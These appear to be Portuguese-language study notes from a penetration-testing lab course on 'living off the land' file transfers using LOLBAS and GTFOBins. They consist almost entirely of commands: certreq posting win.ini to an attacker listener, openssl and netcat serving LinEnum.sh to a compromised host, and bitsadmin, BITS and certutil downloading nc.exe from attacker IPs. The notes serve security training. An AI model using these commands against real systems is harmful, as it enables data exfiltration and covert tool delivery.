Living off The Land

Usando o Projeto LOLBAS e GTFOBins

• LOLBAS

• Para procurar funções de download e upload no LOLBAS podemos usar /downloadou /upload.

• Carregue win.ini para nossa Pwnbox

certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

• Arquivo recebido em nossa sessão Netcat

sudo nc -lvnp 8000

• GTFOBins

• Crie um certificado em nossa Pwnbox

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

• Levante o servidor em nossa Pwnbox

openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

• Baixar arquivo da máquina comprometida

openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

---

Other Common Living off the Land tools

• File Download with Bitsadmin

bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

• Download

Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

• Baixe um arquivo com Certutil

certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe